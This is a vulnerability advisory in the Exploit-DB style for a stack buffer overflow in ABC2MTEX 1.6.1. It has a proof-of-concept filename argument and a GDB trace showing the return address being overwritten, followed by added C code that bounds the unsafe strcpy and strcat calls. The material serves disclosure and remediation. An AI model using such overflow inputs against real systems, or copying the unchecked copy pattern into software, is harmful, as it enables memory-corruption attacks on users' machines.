ABC2MTEX 1.6.1 – Command Line Stack Overflow

  • Author: Carter Yagemann
    Date: 2019-08-14
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/47254/
  • Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow
    Date: 2019-08-13
    Exploit Author: Carter Yagemann <yagemann@gatech.edu>
    Vendor Homepage: https://abcnotation.com/abc2mtex/
    Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
    Version: 1.6.1
    Tested on: Debian Buster
    
    An unsafe strcpy at abc.c:241 allows an attacker to overwrite the return
    address from the openIn function by providing a long input filename. This
    carries similar risk to CVE-2004-1257.
    
    Setup:
    
    $ wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
    $ tar -xzf abc2mtex1.6.1.tar.gz
    $ make
    
    $ gcc --version
    gcc (Debian 8.3.0-6) 8.3.0
    Copyright (C) 2018 Free Software Foundation, Inc.
    This is free software; see the source for copying conditions.  There is NO
    warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
    
    PoC:
    
    $ ./abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
    
    GDB:
    
    We're going to place a breakpoint before and after abc.c:241 to show the overflow.
    
    $ gdb -q ./abc2mtex
    Reading symbols from ./abc2mtex...done.
    (gdb) break abc.c:241
    Breakpoint 1 at 0x4139: file abc.c, line 241.
    (gdb) break abc.c:242
    Breakpoint 2 at 0x414c: file abc.c, line 242.
    (gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
    Starting program: /tmp/tmp.4jy8nhwOI3/abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
    
    Breakpoint 1, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241
    241 (void) strcpy(savename,filename);
    (gdb) bt
    #0  openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241
    #1  0x0000555555556f00 in main (argc=2, argv=0x7fffffffe4f8) at fields.c:273
    (gdb) c
    Continuing.
    
    Breakpoint 2, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242
    242 (void) strcat(filename,".abc");
    (gdb) bt
    #0  openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242
    #1  0x0000414243444546 in ?? ()
    #2  0x00007fffffffe4f8 in ?? ()
    #3  0x0000000200000000 in ?? ()
    #4  0x0000000000000000 in ?? ()
    (gdb) c
    Continuing.
    file "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA" does not exist
    
    Program received signal SIGSEGV, Segmentation fault.
    0x0000414243444546 in ?? ()
    (gdb) quit
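The second backtrace above shows the saved return address replaced by 0x0000414243444546, the bytes of "FEDCBA" read back little-endian, because `strcpy(savename, filename)` at abc.c:241 copies the argument into a fixed-size stack buffer with no length check (and `strcat(filename, ".abc")` on the next line appends to it unbounded as well). The following is an added example, not code from the advisory or from abc2mtex, showing how those two calls look when bounded so that an overlong name is refused instead of written past the buffer. The buffer size `NAME_MAX_LEN`, the function names `open_in_safe`, `demo` and `make_name`, and the `open_status` codes are assumptions for illustration; the real size of `savename` in abc.c is not stated on the page.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size for illustration; the advisory does not state the
 * real size of savename in abc.c. */
#define NAME_MAX_LEN 64
#define SUFFIX ".abc"

enum open_status { OPEN_OK = 0, OPEN_NAME_TOO_LONG = 1 };

/* Bounded analogue of abc.c:241-242 (strcpy(savename, filename) followed by
 * strcat(filename, ".abc")). Copies filename into savename and writes
 * filename + ".abc" into withext, each of size bufsize, refusing any name
 * that would not fit together with the suffix and the terminating NUL. */
int open_in_safe(const char *filename, char *savename, char *withext, size_t bufsize)
{
    size_t suffix_len = strlen(SUFFIX);
    /* Bounded scan: never read more than bufsize bytes of the input. */
    const char *nul = memchr(filename, '\0', bufsize);
    size_t len = nul ? (size_t)(nul - filename) : bufsize;
    if (len + suffix_len >= bufsize)
        return OPEN_NAME_TOO_LONG;
    memcpy(savename, filename, len);
    savename[len] = '\0';
    /* snprintf truncates and always NUL-terminates; the result is checked anyway. */
    int n = snprintf(withext, bufsize, "%s%s", savename, SUFFIX);
    if (n < 0 || (size_t)n >= bufsize)
        return OPEN_NAME_TOO_LONG;
    return OPEN_OK;
}

/* Stand-in for the caller's stack frame: fixed-size local buffers, as in the
 * original openIn. Returns the status so it can be checked by a test. */
int demo(const char *filename)
{
    char savename[NAME_MAX_LEN];
    char withext[NAME_MAX_LEN];
    int st = open_in_safe(filename, savename, withext, sizeof savename);
    if (st == OPEN_OK)
        printf("accepted: %s -> %s\n", savename, withext);
    else
        printf("rejected: name too long (%zu bytes)\n", strlen(filename));
    return st;
}

/* Constructed test input: n_a copies of 'A' followed by tail, mirroring the
 * advisory's PoC argument (120 x 'A' + "FEDCBA"). Static buffer, not re-entrant. */
const char *make_name(size_t n_a, const char *tail)
{
    static char buf[256];
    size_t cap = sizeof buf - strlen(tail) - 1;
    if (n_a > cap)
        n_a = cap;
    memset(buf, 'A', n_a);
    strcpy(buf + n_a, tail);   /* fits: n_a is capped above */
    return buf;
}

int main(void)
{
    demo("tune");
    demo(make_name(59, ""));           /* largest name that still fits */
    demo(make_name(60, ""));           /* one byte too many: rejected */
    demo(make_name(120, "FEDCBA"));    /* the advisory's PoC argument */
    return 0;
}
```

The length check is done once, before either copy, against the combined size of the name, the suffix and the NUL terminator; with the assumed 64-byte buffer the longest accepted name is 59 bytes, and the 126-byte PoC argument is rejected before anything is written to the stack buffers.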